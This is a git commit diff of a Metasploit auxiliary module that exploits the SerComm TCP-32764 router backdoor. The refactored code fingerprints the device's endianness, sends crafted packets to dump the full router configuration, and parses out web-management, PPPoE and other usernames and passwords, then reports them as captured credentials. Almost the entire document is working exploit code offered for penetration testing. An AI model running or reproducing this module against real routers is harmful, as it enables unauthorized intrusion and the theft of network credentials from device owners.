Clean sercomm_dump_config

bug/bundler_fix
jvazquez-r7 2014-01-09 13:42:11 -06:00
parent 01c5585d44
commit be6958c965
1 changed files with 172 additions and 65 deletions

View File

@ -1,3 +1,8 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/auxiliary/report'
@ -6,32 +11,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "SerComm Device Configuration Dump",
'Description' => %q{
This module will dump the configuration of several SerComm devices. These devices
typically include routers from NetGear and Linksys.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', #Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>', #Msf module
],
'References' =>
[
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ],
],
'DisclosureDate' => "Dec 31 2013" ))
register_options(
[
Opt::RPORT(32764),
], self.class)
end
Settings = {
SETTINGS = {
'Creds' => [
[ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ],
[ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],
@ -46,32 +26,154 @@ class Metasploit3 < Msf::Auxiliary
]
}
attr_accessor :endianess
def initialize(info={})
super(update_info(info,
'Name' => "SerComm Device Configuration Dump",
'Description' => %q{
This module will dump the configuration of several SerComm devices. These devices
typically include routers from NetGear and Linksys. This module has been tested
successfully on
},
'License' => MSF_LICENSE,
'Author' =>
[
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', #Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' #Msf module
],
'References' =>
[
[ 'OSVDB', '101653' ],
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
],
'DisclosureDate' => "Dec 31 2013" ))
register_options(
[
Opt::RPORT(32764),
], self.class)
end
def run
print_status("#{peer} - Attempting to connect and check endianess...")
@endianess = fingerprint_endian
print_status("Attempting to connect to #{rhost} to dump configuration.")
if endianess.nil?
print_error("Failed to check endianess, aborting...")
return
end
print_good("#{peer} - #{string_endianess} device found...")
connect
print_status("#{peer} - Attempting to connect and dump configuration...")
config = dump_configuration
data = [0x53634d4d, 0x01, 0x00].pack("VVV")
sock.put(data)
junk = sock.get_once # The MMcS text shows up again for some reason
response = sock.get(3, 3)
disconnect
if response.nil? or response.empty?
print_status("No response from server")
if config.nil?
print_status("#{peer} - Error retrieving configuration, aborting...")
return
end
vprint_status("Response: #{response}")
loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations")
print_status("#{peer} - Router configuration dump stored in: #{loot_file}")
loot_file = store_loot("router.config", "text/plain", rhost, response, "#{rhost}router_config.txt", "Router Configurations")
print_status("Router configuration dump stored in: #{loot_file}")
parse_configuration(config[:data])
end
configs = response.split(?\x00)
private
if (datastore['VERBOSE'])
def little_endian?
return endianess == 'LE'
end
def big_endian?
return endianess == 'BE'
end
def string_endianess
if little_endian?
return "Little Endian"
elsif big_endian?
return "Big Endian"
end
return nil
end
def peer
return "#{rhost}:#{rport}"
end
def fingerprint_endian
begin
connect
sock.put(Rex::Text.rand_text(5))
res = sock.get_once
disconnect
rescue Rex::ConnectionError => e
print_error("Connection failed: #{e.class}: #{e}")
return nil
end
unless res
return nil
end
if res.start_with?("MMcS")
return 'BE'
elsif res.start_with?("ScMM")
return 'LE'
end
return nil
end
def dump_configuration
if big_endian?
pkt = [0x4d4d6353, 0x01, 0x01].pack("NVV")
elsif little_endian?
pkt = [0x4d4d6353, 0x01, 0x01].pack("VNN")
else
return nil
end
connect
sock.put(pkt)
res = sock.get_once
disconnect
if res.blank?
vprint_error("#{peer} - No answer...")
return
end
if big_endian?
mark, zero, length, data = res.unpack("NVVa*")
else
mark, zero, length, data = res.unpack("VNNa*")
end
unless mark == 0x4d4d6353
vprint_error("#{peer} - Incorrect mark when reading response")
return nil
end
unless zero == 0
vprint_error("#{peer} - Incorrect zero when reading response")
return nil
end
unless length == data.length
vprint_warning("#{peer} - Inconsistent length / data packet")
#return nil
end
return { :length => length, :data => data }
end
def parse_configuration(data)
configs = data.split(?\x00)
if datastore['VERBOSE']
vprint_status('All configuration values:')
configs.sort.each do |i|
if i.strip.match(/.*=\S+/)
@ -80,44 +182,49 @@ class Metasploit3 < Msf::Auxiliary
end
end
Settings['General'].each do |regex|
configs.each do |config|
if config.match(regex[1])
value = $1
print_status("#{regex[0]}: #{value}")
end
configs.each do |config|
parse_general_config(config)
parse_auth_config(config)
end
end
def parse_general_config(config)
SETTINGS['General'].each do |regex|
if config.match(regex[1])
value = $1
print_status("#{regex[0]}: #{value}")
end
end
end
Settings['Creds'].each do |cred|
def parse_auth_config(config)
SETTINGS['Creds'].each do |cred|
user = nil
pass = nil
# find the user/pass
configs.each do |config|
if config.match(cred[1]['user'])
user = $1
end
if config.match(cred[1]['pass'])
pass = $1
end
if config.match(cred[1]['user'])
user = $1
end
if config.match(cred[1]['pass'])
pass = $1
end
# if user and pass are specified, report on them
if user and pass
print_status("#{cred[0]}: User: #{user} Pass: #{pass}")
print_status("#{peer} - #{cred[0]}: User: #{user} Pass: #{pass}")
auth = {
:host => rhost,
:port => rport,
:user => user,
:pass => pass,
:type => 'password',
:source_type => "exploit",
:active => true
:host => rhost,
:port => rport,
:user => user,
:pass => pass,
:type => 'password',
:source_type => "exploit",
:active => true
}
report_auth_info(auth)
end
end
end
end